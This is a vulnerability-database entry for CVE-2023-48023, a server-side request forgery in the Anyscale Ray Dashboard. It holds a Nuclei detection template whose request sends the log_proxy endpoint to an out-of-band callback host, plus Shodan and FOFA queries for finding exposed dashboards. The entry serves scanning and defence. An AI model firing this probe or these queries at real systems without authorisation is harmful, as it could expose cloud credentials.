| Reporter | Title | Published | Views | Family All 37 |
|---|---|---|---|---|
| CVE-2023-48023 | 28 Nov 202308:15 | – | attackerkb | |
| CVE-2023-48023 | 17 Dec 202316:42 | – | circl | |
| Ray Security breach | 28 Nov 202300:00 | – | cnnvd | |
| CVE-2023-48023 | 28 Nov 202300:00 | – | cve | |
| CVE-2023-6019 | 16 Nov 202316:12 | – | cve | |
| CVE-2023-48023 | 28 Nov 202300:00 | – | cvelist | |
| Ray Path Traversal vulnerability | 16 Nov 202318:30 | – | github | |
| Ray Missing Authorization vulnerability | 16 Nov 202321:30 | – | github | |
| Ray OS Command Injection vulnerability | 16 Nov 202318:30 | – | github | |
| CVE-2023-48023 | 28 Nov 202308:15 | – | nvd |
id: CVE-2023-48023
info:
name: Anyscale Ray 2.6.3 and 2.8.0 - Server-Side Request Forgery
author: cookiehanhoan,harryha
severity: critical
description: |
The Ray Dashboard API is affected by a Server-Side Request Forgery (SSRF) vulnerability in the url parameter of the /log_proxy API endpoint. The API does not perform sufficient input validation within the affected parameter and any HTTP or HTTPS URLs are accepted as valid.
impact: |
The issue is exploitable without authentication and is dependent only on network connectivity to the Ray Dashboard port (8265 by default). The vulnerability could be exploited to retrieve the highly privileged IAM credentials required by Ray from the AWS metadata API. As an impact it is known to affect confidentiality, integrity, and availability.
remediation: Update to the latest version
reference:
- https://bishopfox.com/blog/ray-versions-2-6-3-2-8-0
- https://huntr.com/bounties/448bcada-9f6f-442e-8950-79f41efacfed/
- https://security.snyk.io/vuln/SNYK-PYTHON-RAY-6096054
- https://nvd.nist.gov/vuln/detail/CVE-2023-48023
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
cvss-score: 9.1
cve-id: CVE-2023-48023
cwe-id: CWE-441,CWE-918
epss-score: 0.35052
epss-percentile: 0.98238
metadata:
verified: true
max-request: 1
vendor: ray_project
shodan-query:
- http.favicon.hash:463802404
- http.html:"ray dashboard"
product: ray
fofa-query:
- icon_hash=463802404
- body="ray dashboard"
tags: cve,cve2023,ssrf,ray,anyscale,Anyscale,vuln
http:
- method: GET
path:
- "{{BaseURL}}/log_proxy?url=http://{{interactsh-url}}"
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "dns"
- type: word
part: body
words:
- "<h1> Interactsh Server </h1>"
# digest: 4a0a00473045022100bc2b3c94150a4733afc7ecfbe940ccb337837a267dfd511c3eb7c503fa52942b022014ff3a29176c271365a9300bba147d221de6e8bf37ab684bf355b99e18589ef5:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation